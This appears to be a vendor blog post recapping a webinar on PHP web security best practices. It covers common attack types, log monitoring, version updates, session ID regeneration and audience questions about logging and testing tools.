Webinar Recap: Web Security Best Practices for PHP

Every day, millions of pieces of sensitive data, both personal and business related, are processed by web applications. And every day, applications are at risk of being exposed to new PHP security threats that make that sensitive data vulnerable to attack. With the cost of data breaches averaging over $3.8M and mean time to identify attacks topping 190 days, it’s critical to ensure the security and compliance of your PHP applications and stacks.

Last week, Daryl Wood presented the first webinar in our series focused on the best practices every development team should follow to ensure the security of their web applications.

If you missed it, here’s your recap. If you attended, you might have missed a few nuggets. Either way, it’s worthwhile to share this post and the on-demand version with your colleagues interested in security.

Top Security Attack Types

An attack can have a significant impact on your business information and reputation. Attacks can lead to data loss, corruption, access denial, and account compromises, which can translate to bad publicity, lack of accountability, and in a worst-case scenario, litigation expenses. The top attacks and vulnerabilities to watch out for include:

• SQL injection
• Cross-site scripting (XSS)
• Broken session management
• Brute force

Preventing Security Attacks

Log monitoring is all about keeping an eye on what’s being attacked, from where, and even sometimes by whom. PHP application error logging is not enabled by default, so it’s important to enable this to take advantage of the many monitoring tools available in the market.

It’s also important to be proactive in updating your PHP servers to the latest version to prevent problems. Being on the latest version ensures you will have access to bug and security fixes, and your system monitoring will function correctly. Older versions of PHP (5.6 and lower) are no longer supported by the community, which means your applications are at risk. Long-term support for PHP 5.6 applications is available through Zend Server until the end of 2020.

Audience Questions

In the Zend/PHP environment, are there log monitoring tools or capabilities that we can use?

Yes, if you are referring to Zend Framework. Zend Framework has a component, Zend\Log, that handles logging, and zend-http that can handle notifications. Also worthy of note, Zend Framework is componentized. What that means is the ability to use only these components in any application, regardless of technology stack, without the entire Zend Framework. There are also good third-party tools available, such as, Monolog, which is available as a Composer package.

Does regeneration of session id in subsequent requests help with improvement of security and in what way?

Yes, as long as the old session is destroyed either via a call to session_destroy() or session_regenerate_id(true). Passing "true" to the latter ensures the old session is destroyed.

How would you encourage your team members to put some effort into improving security without "compromising" the current phase?

Put a policy in place and assign responsibility to do a periodic code audit and implementation. An option for this could be as simple as starting with an audit of all controller actions, and how they handle input or do all web forms including cross-site-request-forgery tokens, then just check the forms.

What is the best tool in your opinion that can be used on Kali Linux to test the security of web applications?

That's a tough one. There are many. One to consider is sqlmap, which can, with command line arguments, hammer an SQL server exposing flaws.

Next steps Watch the full on-demand recording of Part 1: Web Security Best Practices for PHP and Part 2: PHP Application Code Best Practices.

Related Resources

• Best Practices for Security Testing for Software